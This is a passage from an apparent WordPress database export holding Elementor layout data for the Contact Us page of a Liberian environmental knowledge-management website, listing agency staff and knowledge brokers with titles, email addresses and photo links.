e\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(16036,2423,'_elementor_edit_mode','builder'),(16037,2423,'_elementor_template_type','wp-page'),(16038,2423,'_elementor_version','2.7.5'),(16039,2423,'_wp_page_template','default'),(16040,2423,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"ta